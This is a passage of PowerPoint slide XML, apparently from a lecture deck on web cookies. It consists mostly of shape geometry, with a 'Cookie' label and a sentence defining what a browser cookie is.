                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5686E44-74D9-7844-A647-1B6D295E7930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1289050" y="3121025"/>
            <a:ext cx="139700" cy="438150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 104506 w 138430"/>
              <a:gd name="T1" fmla="*/ 424189 h 438785"/>
              <a:gd name="T2" fmla="*/ 54782 w 138430"/>
              <a:gd name="T3" fmla="*/ 386374 h 438785"/>
              <a:gd name="T4" fmla="*/ 28476 w 138430"/>
              <a:gd name="T5" fmla="*/ 354993 h 438785"/>
              <a:gd name="T6" fmla="*/ 1079 w 138430"/>
              <a:gd name="T7" fmla="*/ 287391 h 438785"/>
              <a:gd name="T8" fmla="*/ 0 w 138430"/>
              <a:gd name="T9" fmla="*/ 251173 h 438785"/>
              <a:gd name="T10" fmla="*/ 7332 w 138430"/>
              <a:gd name="T11" fmla="*/ 213343 h 438785"/>
              <a:gd name="T12" fmla="*/ 23071 w 138430"/>
              <a:gd name="T13" fmla="*/ 173901 h 438785"/>
              <a:gd name="T14" fmla="*/ 47218 w 138430"/>
              <a:gd name="T15" fmla="*/ 132844 h 438785"/>
              <a:gd name="T16" fmla="*/ 79779 w 138430"/>
              <a:gd name="T17" fmla="*/ 90174 h 438785"/>
              <a:gd name="T18" fmla="*/ 120749 w 138430"/>
              <a:gd name="T19" fmla="*/ 45893 h 438785"/>
              <a:gd name="T20" fmla="*/ 170130 w 138430"/>
              <a:gd name="T21" fmla="*/ 0 h 4387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8430" h="438785">
                <a:moveTo>
                  <a:pt x="84710" y="438557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44405" y="399460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23078" y="367016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="875" y="297126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="259681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5941" y="220569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18699" y="179790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38273" y="137343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64665" y="93229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97873" y="47448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137897" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="2946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867" name="object 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88BFAA67-43A3-E640-9E18-222380950AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1325563" y="3497263"/>
            <a:ext cx="144462" cy="127000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 77022 w 144144"/>
              <a:gd name="T1" fmla="*/ 0 h 127000"/>
              <a:gd name="T2" fmla="*/ 0 w 144144"/>
              <a:gd name="T3" fmla="*/ 107010 h 127000"/>
              <a:gd name="T4" fmla="*/ 151092 w 144144"/>
              <a:gd name="T5" fmla="*/ 126720 h 127000"/>
              <a:gd name="T6" fmla="*/ 77022 w 144144"/>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144" h="127000">
                <a:moveTo>
                  <a:pt x="73215" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="107010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143624" y="126720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732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5868" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A416E35D-F30C-B84B-8F4C-94CD1DBCBA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1812925" y="3365500"/>
            <a:ext cx="1041400" cy="5000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69" name="object 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA24D72A-A460-7248-A643-3A78B181068E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1831975" y="3384550"/>
            <a:ext cx="1003300" cy="4603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5870" name="object 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B72F99-79DD-CF4F-A3BA-D9776718DC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3479800"/>
            <a:ext cx="6985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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="170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40B7E8B7-1090-4046-A5E0-D3AB05E340AF}"/>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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A62791-7E41-1546-A23D-7E0A87794C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1039813" y="890588"/>
            <a:ext cx="8221662"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60338" indent="-1476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cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments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bject 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16083291-EA77-0A4B-AABB-E35FC28CCF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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15" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6DAF4C8-E5FE-B342-A6FC-523B190E0D7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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8916" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF1D5DC4-3671-AA4B-9719-4E7353CDE291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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17" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACDC8C0-D36A-404B-9F8B-A469FD8D3F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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18" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D9F24A-AFF1-A245-AA1A-AC023279899D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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19" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F762CC56-C1D2-574E-8044-09E535C26933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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0" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31667137-6640-7144-A063-CFE4777D6811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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1" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF356605-748D-6844-BBF7-37FD034625F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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2" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A8E7A4-F2AA-F544-96A9-E15F6B9C6820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827881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789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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8923" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BF73358-7502-C642-B932-96E8FC45BA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>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4" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96A0C5C-A2DE-CD4C-B536-7F84F0552EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847248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5" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A309B017-CAEB-3243-A774-74A55DAECDB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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6" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D765DA-B36E-5648-97AF-6A95B6D72808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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7" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A488E4-D0D9-024B-AE8C-D28823C7BB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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8" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD82C964-4210-D748-A000-5C980E64F75E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>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29" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3756928-D06B-7C4D-8897-20E471692802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>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30" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1E003D-28DD-B346-B7E6-E9F1CC81822A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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31" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50076A83-FCA9-F743-8141-C18D7DCD847F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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32" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DE63A7-A190-FD41-9BD0-CFE8EE569B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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33" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6F21C25-B21E-F349-8501-C1DC08C777FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646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2697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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8934" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE80B85-9322-224A-96E4-CEA920E0ED6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675"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B0CC65DB-8C2A-8142-A1A5-D6B205A82778}"/>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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02219B3-F452-FF4E-9D49-D98E6CD889CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9437688" y="7505700"/>
            <a:ext cx="468312" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38937" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A8C595-9CDC-8C40-89B2-18B405EF69F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
